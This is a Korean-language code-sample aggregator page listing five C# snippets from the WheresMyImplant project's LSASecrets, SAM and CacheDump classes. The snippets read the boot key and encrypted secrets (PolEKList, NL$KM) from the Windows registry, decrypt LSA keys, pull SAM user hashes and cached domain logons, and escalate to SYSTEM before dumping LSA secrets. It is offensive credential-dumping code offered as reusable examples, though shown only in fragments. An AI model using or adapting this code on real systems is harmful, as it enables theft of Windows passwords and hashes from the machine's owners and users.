C# (CSharp) WheresMyImplant LSASecrets 예제들

프로그래밍 언어: C# (CSharp)

네임스페이스/패키지 이름: WheresMyImplant

클래스/타입: LSASecrets

hotexamples.com에서의 예제들: 5

C# (CSharp) WheresMyImplant LSASecrets - 5개의 예제가 발견되었습니다. 이것들은 오픈소스 프로젝트에서 추출된 C# (CSharp)의 WheresMyImplant.LSASecrets에 대한 실세계 최고 등급의 예제들입니다. 예제들을 평가하여 예제의 품질 향상에 도움을 줄 수 있습니다.

자주 사용되는 메소드들

보기 숨기기

DecryptLsa(2)

GetBootKey(2)

DumpLSASecrets(1)

GetLsaKey(1)

예제 #1

파일 보기

파일: LSASecrets.cs 프로젝트: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 internal static Byte[] GetLsaKey(Byte[] bootKey)
 {
     Byte[] polEKList = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\PolEKList", "");
     Byte[] lsaKey    = LSASecrets.DecryptLsa(polEKList, bootKey);
     lsaKey = lsaKey.Skip(68).Take(32).ToArray();
     return(lsaKey);
 }

예제 #2

파일 보기

파일: SAM.cs 프로젝트: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 internal SAM()
 {
     Byte[] bootKey = LSASecrets.GetBootKey();
     Console.WriteLine("[+] BootKey: {0}", System.BitConverter.ToString(bootKey).Replace("-", ""));
     Byte[] hBootKey = GetHBootKey(bootKey);
     Console.WriteLine("[+] HBootKey: {0}", System.BitConverter.ToString(hBootKey).Replace("-", ""));
     UserKeys[] userKeys = GetUserHashes(hBootKey);
     DecryptUserHashes(ref userKeys, hBootKey);
 }

예제 #3

파일 보기

파일: CacheDump.cs 프로젝트: zforks/WheresMyImplant

        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal CacheDump()
        {
            String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");

            Console.WriteLine("[*] {0} Cached Logons Set", logonCount);

            Byte[] bootKey = LSASecrets.GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
            Byte[] nlkm = GetNlkm(lsaKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
            GetCache(nlkm);
        }

예제 #4

파일 보기

 //Checked
 public static void DumpLSA()
 {
     try
     {
         CheckPrivileges checkSystem = new CheckPrivileges();
         if (!checkSystem.GetSystem())
         {
             Console.WriteLine("[-] GetSystem Failed");
             return;
         }
         LSASecrets lsaSecrets = new LSASecrets();
         lsaSecrets.DumpLSASecrets();
     }
     catch (Exception ex)
     {
         Console.WriteLine("[-] {0}", ex.Message);
     }
 }

예제 #5

파일 보기

파일: CacheDump.cs 프로젝트: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 private static Byte[] GetNlkm(Byte[] lsaKey)
 {
     Byte[] encryptedNlkm = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\NL$KM\CurrVal", "");
     return(LSASecrets.DecryptLsa(encryptedNlkm, lsaKey));
 }